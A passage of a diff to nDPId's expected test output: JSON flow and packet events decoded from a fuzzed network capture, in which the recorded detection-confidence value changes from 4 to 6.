00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1120469590455,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":388,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":388,"pkt_l4_len":354,"thread_ts_msec":1120469590455,"pkt":"AODtAW69ADBUADRBCABFAAF2AABAADcRirfU8iEjwKgBAhPEE8QBYot4U0lQLzIuMCA0MDMgV3JvbmcgcGFzc3dvcmQNCkNhbGwtSUQ6IDU3ODIyMjcyOS00NjY1ZDc3NUA1NzgyIjI3MzItNDY2NWQ3NzINCsNTZXE6IDY5IFJFR0lTVEVSDQpGcm9tOiA8c2lwOnZvaTE4ajYzQHNpcC5jeWJlcmNpdHkuZGs+O3RhZz04ZTk0OGIwDQpUbzogPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt022c9MDAtMDQwODUtMTcwMWFmOTgtNTFhNjViMzQwDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yO3JlY2VpdmVkPTgwLjIzMC4yMTkuNzA7cnBvcnQ9NTA2MDvicmFuY2g9ejloRzRiS25wMTQ5NTA1MTc4LTIzOGM1MjhiMTkyLjE2OC4xLjINCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1120469595096,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120469595096,"pkt":"3\/\/\/\/\/\/\/AODtAW69CABFAADlaaMAAIARTBPAqAECwKgB+wCKAIoA0VtoEQ6E7MCoAQIAigC7AACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -77,12 +77,12 @@ 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1120469632829,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1120469632829,"pkt":"ADBUADRWAODtAW69CABFAAA9aaoAAIARTbLAcgECwKgBAQqfADUAKUpe7dQBAAABgAAAUgAAA2Z0cAdlY2l0ZexlA2NvbQAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1120469633828,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1120469633828,"pkt":"ADBUADRWEODtAW69CABFAAA9aasAAIARTbHAqAECwKgBAQqfADUAKUpe7dQBAAABAAAAAAAAA2Z0cAdlY2l0ZWxlA2NvbQAAAQAB"} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1120469634840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1120469634840,"pkt":"AODtAW69ADBUADRWCABFAACaAABAAEARtv\/AqAEBwKgBAgA1Cp8Ahtfh7dSBgAABAAKzAgABA2Z0cLxlY2l0ZexlA2NvbQAAAQABwAwABQABAAAC9QAGA2Ruc8AQwC0AAQABAAAAIQAEk+oB\/cAQAAIAAQAAA0MAEQJucwViYXJhawNuZXQCaWwAwBAAAgABAAADQwACwC3ATwABAGoAAAARAATUljCp"} -00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}} +00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469634896} @@ -141,55 +141,55 @@ 00414{"packet_event_id":1,"packet_event_name":"packet","packet_id":97,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469637833,"pkt":"\/\/\/\/\/7\/\/AODtAW69CABFAABeacMAAIARTIrAqAECwKgB\/wCJAIkAOluqhPEBEAABAAAAAAB0IEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1120469663172,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469663172,"pkt":"ADBUADRWAODtAW69CABFAABIacgAAIARTYnAqAECwIgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469663172,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1120469664171,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469664171,"pkt":"ADBUADRWAODtAW69CABFAABIackAAIARTYjAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469664171,"flow_last_seen":1120469664171,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469664171,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1120469666174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469666174,"pkt":"ADBUADRWAODtAW69CABFAABIacoAAIARpYfAqAECwKgBAQqiADUANFpNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1120469668178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW69CABFAABIacsAAIARTYbAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhADA="} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120469672183} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":104,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120469668178,"pkt":"ADBUADRWAODtAW7bCABFABFIacwAAIARTYXAqAECwKgBAQqiADUANGxNvdUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":105,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469680185,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1120469680186,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469680186,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CqMAR8XBQdaAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469680186,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","ndpi": {"confidence": 